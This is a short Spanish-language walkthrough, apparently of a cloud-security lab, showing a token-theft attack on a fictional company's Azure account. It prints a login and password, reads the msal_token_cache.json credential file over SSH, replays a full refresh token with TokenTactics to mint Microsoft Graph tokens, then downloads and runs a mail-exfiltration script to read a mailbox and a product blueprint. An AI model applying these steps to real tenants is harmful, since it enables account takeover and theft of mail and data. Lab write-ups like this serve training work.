Cu3rv0x
TokenTactics

TokenTactics


Windows

Hicimos el primer paso que seria logearnos en el portal de azure y identificar los recursos en los cual tenemos acceso.

Credenciales lindsey.miller@megabigtech.com:SUmmer07!!!

ssh_command.

ssh_command.

ssh_command.

nc -nv 13.68.147.240 22

ssh_command.

ssh lindsey@13.68.147.248

ssh_command.

id

cd ~/.azure

ssh_command.

cat msal_token_cache.json

ssh_command.

ssh_command.

Invoke-RefreshToMSGraphToken -domain megabigtech.com 1.AU4A78yQJX1oO0mujUQcurY6cpV3sATbjRpGu-4C-eG_e0YOAR5OAA.AgABAwEAAABVrSpeuWamRam2jAF1XRQEAwDs_wUA9P-nS4_D4HOmI7Ihh3jTU6KqE_jiUDwHfJII3ewdwwu3mUH8Hd54QrIbB3AQsEd64oAm4IpHWecNHSaD73aQfU2RKpFMnR7zooBo-7cwibEIZyJrw_F25Mdj4e0hIdptzvflkRls1cM0HnHTOZG3Lw3kEI9YoG3dzLsc9T7f208K7394cWfQaTQNvfXIFajQPd9zABwU4SY3t9CrcZO8Tp9mv4kf4CzanoT1E3UR7ecHczw_0I7vW9ghCCPYUxIZHB9PsGFyiPlC06Jo-1EYlu4OiFE_6atNvDqyLeT4M1aHSpm4DmtEqiLapgcjyI8D6VvAK8ZtJUPRLe1tkCBbSOC0WMC3PPCdEvtFIw_dcencF0UxwzAL1kYWNL6d86J_fhQ0Z8tWdR8iJpZGfQ7vqNaXmlJ3iTF7AZSQa2m-Pyvo-VEDDZHCge4rLdcM7Hm3j6lu2-OqIk6AoDqyQgHVtIp1GCWIbcUXCwC-fH4BwIVWyAEN2DSIBYCsTtBxoCj_J7dbiCoAWq8YUQPVmgt_6iH892sEP3Am5cCDAepx4Fj2eeYybg2fUaBHoikjLA1kgzTl6ysUrEGaah4NN21DDTJtXhJwwon2aO5M-rxEqoxHVzeUjRlh0dq5tf5E3z5vyi99MCrvPnND-dl7p5RnSRj1hbTJzWIgDlznGjhVGo2QizohvPImjxNXRl_FKvI2P3Kg7WnLEEkzN8FQ2DQF15yK0pc7LGa37SJjAWzbmZ60QK8

ssh_command.

MSGRaphToken.access_token

Creamos un access_token con TokenTactics

ssh_command. MSGRaphToken.refresh_token

Creamos un refresh_token

ssh_command.

wget https://raw.githubusercontent.com/rootsecdev/Azure-Red-Team/master/Tokens/exfil_exchange_mail.py

ssh_command.

vim exfil_exchange_mail.py

Agregamos el access token como valor a la variable token en exfil_exchange_mail.py

ssh_command.

python3 ./exfil_exchange_mail.py

Ahora tenemos acceso a correos y el blueprint de ePhone

ssh_command.

firefox './ePhone 16 blueprint.html'

ssh_command.

ssh_command.

© 2025 Cu3rv0x